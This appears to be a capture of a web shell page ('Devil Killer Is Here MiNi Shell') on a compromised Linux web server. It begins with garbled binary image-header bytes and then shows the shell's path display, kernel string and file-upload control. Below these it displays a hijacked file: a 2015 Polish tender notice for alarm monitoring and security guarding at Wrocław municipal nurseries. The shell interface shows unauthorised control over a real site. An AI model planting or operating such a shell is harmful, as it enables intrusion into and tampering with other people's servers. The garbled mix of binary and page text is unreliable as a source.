JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151214/184211-N-2015.html

<p class="kh_header"><b>Wrocław: Ochrona mienia zarządzanego przez Wrocławski Zespół Żłobków poprzez stały dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, podejmowanie interwencji oraz konserwowanie urządzeń systemu sygnalizacji włamania.

Znak postępowania ZP-99/WZŻ/2015</b><br>
<b>Numer ogłoszenia: 184211 - 2015; data zamieszczenia: 14.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wrocławski Zespół Żłobków , ul. Fabryczna 15, 53-609 Wrocław, woj. dolnośląskie, tel. 71 358 46 46, faks 71 358 46 47.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona mienia zarządzanego przez Wrocławski Zespół Żłobków poprzez stały dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, podejmowanie interwencji oraz konserwowanie urządzeń systemu sygnalizacji włamania.

Znak postępowania ZP-99/WZŻ/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Ochrona mienia zarządzanego przez Wrocławski Zespół Żłobków poprzez stały dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, podejmowanie interwencji oraz konserwowanie urządzeń systemu sygnalizacji włamania w następujących obiektach Wrocławskiego Zespołu Żłobków:
1.1.   Żłobek nr 1 - ul. Lwowska 20, Wrocław,
1.2.   Żłobek nr 2 - ul. Zemska 33, Wrocław,
1.3.   Żłobek nr 3 - ul. Białowieska 27, Wrocław,
1.4.   Żłobek nr 4 - ul. Kłodnicka 25, Wrocław,
1.5.   Żłobek nr 5 - ul. Dokerska 5, Wrocław,
1.6.   Żłobek nr 6 - ul. Krowia 1, Wrocław,
1.7.   Żłobek nr 7 - ul. Drukarska 9, Wrocław,
1.8.   Żłobek nr 8 - ul. Sądowa 6, Wrocław,
1.9.   Żłobek nr 9 - ul. Wrońskiego 13d, Wrocław,
1.10. Żłobek nr 10 - ul. H. Brodatego 17, Wrocław,
1.11. Żłobek nr 11 - ul. Hubska 39, Wrocław,
1.12. Żłobek nr 12 - ul. Jugosłowiańska 85a, Wrocław,
1.13. Żłobek nr 13 - ul. Wieczysta 107, Wrocław,
1.14. Żłobek nr 14 - ul. Mulicka 4c, Wrocław,
1.15. Żłobek nr 15 - ul. Łukowa 37, Wrocław
1.16. Budynek administracyjny - ul. Fabryczna 15, Wrocław.
2.	Termin wykonania zamówienia od 1.01.2016 r. do 31.12.2016 r.
3.	W związku z realizowanymi i planowanymi robotami budowlanymi oraz zamknięciem na czas remontu następujących placówek:
- Żłobka nr 3 - ul. Białowieska 27, Wrocław (styczeń-marzec 2016),
- Żłobka nr 12 - ul. Jugosłowiańska 85a, Wrocław (lipiec-grudzień 2016)
powyższe żłobki będą czasowo wyłączone z realizacji umowy. Rozliczenie umowy będzie się odbywało za faktycznie wykonaną usługę w okresie nie pełnych 12 miesięcy.
4.	Wykonawca w porozumieniu z poprzednim Wykonawcą uzgodni terminy montażu nadajników, przekazania kodów dostępu do central w sposób umożliwiający ciągły, nieprzerwany dozór obiektów Zamawiającego.

5.	Wykonawca zobowiązuje się zarejestrować sygnały przyjęte z lokalnego systemu sygnalizacji włamania.
6.	Monitorowanie sygnałów lokalnego systemu sygnalizacji włamania polegać będzie na przyjmowaniu sygnałów z lokalnego systemu sygnalizacji włamania i przekazywaniu odpowiadających tym sygnałom informacji osobom wskazanym przez Zamawiającego.
7.	Wykonawca ma obowiązek zapewnić ochronę bezpośrednią obiektu poprzez grupę interwencyjną, która podejmie się czynnego działania niezwłocznie po uzyskaniu sygnału o zagrożeniu obiektu. Wykonawca zobowiązuje się do podejmowania interwencji w systemie całodobowym na każdy sygnał alarmowy odebrany przez centrum monitorowania z lokalnego systemu sygnalizacji i włamania Zamawiającego.
8.	Wykonawca musi posiadać centrum monitorowania z całodobową obsługą posiadającą legitymację kwalifikowanego pracownika ochrony fizycznej, odpowiednio zabezpieczone przed dostępem osób postronnych oraz próbami celowego uszkodzenia, zniszczenia lub zakłócenia jego pracy. Obsługa centrum monitorowania musi posiadać wpis na listę kwalifikowanych pracowników ochrony fizycznej. Wykonawca winien dysponować minimum 3 pracownikami z opisanymi powyżej kwalifikacjami.
9.	Grupa interwencyjna musi składać się z co najmniej 2 pracowników ochrony fizycznej, posiadających legitymacje kwalifikowanych pracowników ochrony fizycznej 
i wyposażonych w środki przymusu bezpośredniego oraz posiadających niezależną łączność umożliwiającą bezpośredni kontakt z centrum monitorowania i samochód interwencyjny. Pracownicy grupy interwencyjnej muszą posiadać wpisy na listę kwalifikowanych pracowników ochrony fizycznej. Wykonawca winien dysponować minimum 6 pracownikami z opisanymi powyżej kwalifikacjami.
10.	Wykonawca przedkłada aktualną koncesję na prowadzenie działalności w zakresie ochrony osób i mienia wydaną przez Ministra Spraw Wewnętrznych i Administracji.
11.	Czas przyjazdu grupy interwencyjnej nie może przekroczyć 10 minut od odebrania sygnału o alarmie i podjęcia czynności ochronnych. Po dokonaniu stosownych sprawdzeń grupa interwencyjna ma obowiązek podjąć działania, takie jak: powiadomienie Policji, Straży Pożarnej, Pogotowia Ratunkowego, osób wskazanych przez Zamawiającego oraz zabezpieczenia chronionego obiektu do czasu przybycia osób wskazanych przez Zamawiającego (Policji, Straży Pożarnej, Pogotowia Ratunkowego).  
12.	Nadajnik powiadomienia radiowego Wykonawca instaluje w obiektach Zamawiającego na czas trwania umowy nieodpłatnie.
13.	Zamawiający wyraża zgodę na wejście do obiektu chronionego przez patrol interwencyjny i w przypadku gdy włączenie sygnału alarmowego nie wiązało się z działaniami wynikłymi z przestępstwa lub wykroczenia - Zamawiający upoważnia grupę interwencyjną do usunięcia przyczyn włączenia sygnału alarmowego. W takim przypadku Wykonawca zobowiązany będzie do sporządzenia protokołu interwencji, w którym szczegółowo wskaże datę interwencji (z podaniem godziny rozpoczęcia i zakończenia interwencji), przyczyny interwencji, przyczyny włączenia sygnału alarmowego, podjęte przez grupę interwencyjną działania.
14.	Zamawiający wyraża zgodę na oznakowanie obiektów, w których Wykonawca wykonuje usługę w formie i miejscach zaakceptowanych przez Zamawiającego.
15.	Wykonawca, jeśli uzna, iż jest to niezbędne, dokonuje na własny koszt wizji lokalnej 
w obiektach WZŻ, które będą objęte przedmiotem zamówienia. Termin wizji lokalnej należy uzgodnić z kierownikami placówek lub osobami upoważnionymi. 
16.	Wykonawca będzie ponosił pełną odpowiedzialność za skutki spowodowane niewykonaniem lub nienależytym wykonaniem prac, w tym także za prawidłową ochronę przeciwpożarową oraz BHP w trakcie wykonywania prac, jak również ponosi wszelkie konsekwencje wynikające z braku nadzoru i zabezpieczenia obiektu Zamawiającego zgodnie z opisem przedmiotu zamówienia.
17.	Wykonawca ma w obowiązku realizować przedmiot zamówienia w oparciu o aktualne przepisy prawa, tj.:
- Ustawa z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz. U. z 2014 r. poz. 1099);
- Ustawa z dnia 13 czerwca 2013 roku o zmianie ustaw regulujących wykonywanie niektórych zawodów (Dz. U. z 2013 r. poz. 829);
- Rozporządzenie Ministra Zdrowia z dnia 19 grudnia 2013 r. w sprawie badań lekarskich i psychologicznych osób ubiegających się o wpis lub posiadających wpis na listę kwalifikowanych pracowników ochrony fizycznej (Dz. U. z 2013 r. poz. 1715);
- Rozporządzenie Ministra Spraw Wewnętrznych z dnia 18 grudnia 2013 r. w sprawie wymagań w zakresie szkoleń i kursów potwierdzających przygotowanie teoretyczne i praktyczne w zakresie wyszkolenia strzeleckiego, samoobrony, technik interwencyjnych oraz znajomości przepisów prawa związanych z wykonywaniem ochrony osób i mienia  (Dz. U. z 2013 r. poz. 1688);
- Rozporządzenie Ministra Spraw Wewnętrznych z dnia 16 grudnia 2013 r. w sprawie wzoru wniosku o wpis na listę kwalifikowanych pracowników ochrony fizycznej, wzoru wniosków o wpis na listę kwalifikowanych pracowników zabezpieczenia technicznego oraz wzoru zaświadczenia o wpisie na te listy (Dz. U. z 2013 r. poz. 1628).
18.	Wykonawca przedłoży polisę odpowiedzialności cywilnej OC, o której mowa 
w Rozporządzeniu Ministra Finansów z dnia 9 grudnia 2013 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej przedsiębiorcy wykonującego działalność gospodarczą w zakresie usług ochrony osób i mienia (Dz. U. 2013 poz. 1550), w zakresie prac objętych zamówieniem, najpóźniej w dniu podpisania umowy, na wartość minimum pokrywającą w całości kwotę zamówienia, obowiązującą przez cały okres trwania umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2, 72.25.00.00-2, 79.71.00.00-4, 79.71.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, jeżeli Wykonawca wykaże, że posiada aktualną  koncesję uprawniającą do prowadzenia działalności gospodarczej w zakresie ochrony osób i mienia wydaną przez Ministra Spraw Wewnętrznych i Administracji. 
Sprawdzenie w/w warunku odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, jeżeli Wykonawca wykaże, że dysponuje jednym samochodem interwencyjnym z niezależną łącznością umożliwiającą bezpośredni kontakt z centrum monitorowania. (załącznik nr 3a do SIWZ)
 Sprawdzenie w/w warunku odbywać się będzie na podstawie przedłożonego przez Wykonawcę oświadczenia wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 3 osobami, osoby w centrum monitorowania z całodobową obsługą, odpowiednio zabezpieczone przed dostępem osób postronnych oraz próbami celowego uszkodzenia, zniszczenia lub zakłócenia jego czasu pracy i minimum 6 osób grupy interwencyjnej, wyposażonych w środki przymusu bezpośredniego posiadającymi zaświadczenie o wpisie na listę kwalifikowanych pracowników ochrony fizycznej oraz posiadającymi legitymację kwalifikowanych pracowników ochrony fizycznej.
b)	Ponadto przedstawiciel wykonawcy odpowiedzialny za przeprowadzenie konserwacji i napraw systemu sygnalizacji włamania musi być wpisany na listę kwalifikowanych pracowników zabezpieczenia technicznego, który to wpis uprawnia do wykonywania wyżej opisanych czynności. Wykonawca winien dysponować minimum 1 pracownikiem posiadający w/w kwalifikacje. (załącznik nr 3a do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wypełniony i podpisany Formularz Oferty - Załącznik Nr 1 do SIWZ. 
b)	Wypełniony i podpisany  Formularz cenowy - Załącznik Nr 2 do SIWZ i Wykaz części zamiennych - Załącznik nr 2a do SIWZ. 
c)	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w punkcie dotyczącym dokumentów podmiotów zagranicznych, zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Terminy wskazane w rozdziale V pkt 3) stosuje się odpowiednio.
d)	W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
e)	W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy PZP, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
f)	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym,  osobach dolnych do wykonania zamówienia, zdolnościach finansowych lub  ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących  go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych
        podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania
zamówienia, z którego będzie wynikać w szczególności : 
a)zakres dostępnych wykonawcy zasobów innego podmiotu; 
b) sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, 
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 
d) zakres i okres udziału innego podmiotu przy Wykonywaniu zamówienia. 
        Zgodnie  z treścią art. 26 ust. 2e ustawy Pzp,   podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26  ust.  2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą  wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
g)	Dokument, z którego wynika upoważnienie osoby/osób do podpisania oferty w imieniu   Wykonawcy lub pełnomocnictwo do reprezentowania Wykonawcy składa się  w formie oryginału lub kopii poświadczonej przez notariusza, o ile nie wynika ono z  innych dokumentów załączonych do oferty przez Wykonawcę.
h)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w 
          myśl art. 23 ustawy PZP:
należy dostarczyć pełnomocnictwo do reprezentowania wszystkich Wykonawców. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia. Zamawiający dopuszcza złożenie przedmiotowego dokumentu w formie oryginału lub kopii poświadczonej przez notariusza,
Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć samodzielnie dokumenty wymienione w rozdz. V pkt (4 oraz pkt (2 ppkt b). 
i)	Oświadczenie o spełnieniu warunków udziału w postępowaniu wymienione w rozdz. 
V pkt (1 oraz oświadczenie o braku podstaw do wykluczenia wymienione w rozdz. V pkt (2 Wykonawcy mogą złożyć:
wspólnie tj. podpisane przez pełnomocnika, wszystkich wykonawców na jednym dokumencie, a w przypadku oświadczenia o spełnieniu warunków udziału w postępowaniu, Zamawiający popuszcza złożenie oświadczenia przez podpisanie ww. dokumentu przez jednego, kilku lub wszystkich z Wykonawców spełniających warunki udziału w postępowaniu, wspólnie ubiegających się o udzielenie zamówienia albo:, 
odrębnie tj. podpisanie przez każdego z Wykonawców na odrębnym dokumencie a w przypadku oświadczenia o spełnianiu warunków udziału w postępowaniu, Zamawiający dopuszcza złożenie oświadczenia na odrębnych formularzach przez jednego, kilku lub każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełniających warunki udziału w postępowaniu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Czas reakcji grupy interwencyjnej - 20</li>
<li>3 - 1 roboczogodzina brutto - 10</li>
<li>4 - Koszty zakupu - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia umowy wymagają zachowania formy pisemnej w postaci aneksu do niniejszej umowy podpisanego przez obie Strony, pod rygorem nieważności. 
2.	Zamawiający przewiduje możliwość zmiany umowy w następujących przypadkach:
a)	gdy ze względów organizacyjnych nastąpi przekazanie w trakcie trwania umowy obiektu do zarządzania innemu podmiotowi gminnemu, w takim przypadku wynagrodzenie zostanie pomniejszone o ilość przekazanych obiektów.
b)	gdy w trakcie trwania umowy zmianie ulegać będzie zasób obiektów Zamawiającego, zatem zmiana ta może dotyczyć wskazania innych adresów w miejsce wskazanych przy zawarciu umowy (zmiana lokalizacji nie powoduje dodatkowego wynagrodzenia).
c)	zmiana przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia
d)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami w myśl postanowień §1 ust. 3 
